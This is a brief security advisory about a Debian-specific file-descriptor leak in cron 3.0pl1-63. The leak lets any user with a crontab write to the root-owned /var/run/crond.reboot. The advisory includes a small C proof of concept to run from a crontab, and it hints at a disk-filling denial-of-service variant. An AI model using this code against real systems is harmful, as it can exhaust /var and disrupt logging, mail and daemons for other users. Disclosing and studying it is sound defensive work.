|
Vulnerability cron Affected cron 3.0.pl1-63 Description Matthew Toseland found following. This appears to be debian-specific. How to exploit, other than DoS attacks/quota bypass? What does /var/run/crond.reboot do? Matthew have discovered a problem with the cron 3.0pl1-63 in woody. It does not close /var/run/crond.reboot when it forks and setuids. So any user who has a crontab can write to /var/run/crond.reboot, which is created with permissions 0000 and user/group root/root. This may or may not be exploitable for elevated privelidge, but at the very least could be a quota violation or similar, leading to local DoS of the /var filesystem, hence disabling logging, mail, restarting of system daemons... on most systems. Note that this only works if there is a /var/run/crond.reboot. Sample code: #include <stdio.h> #include <unistd.h> void main() { char* p = "hahahahahahahahahahahahahahahahahahahaha\n"; int x = strlen(p); write(6,p,x-1); close(6); } Compile and insert into your crontab. DoS variant is obvious. Solution BTW, is fixed now and appears to be debian-specific.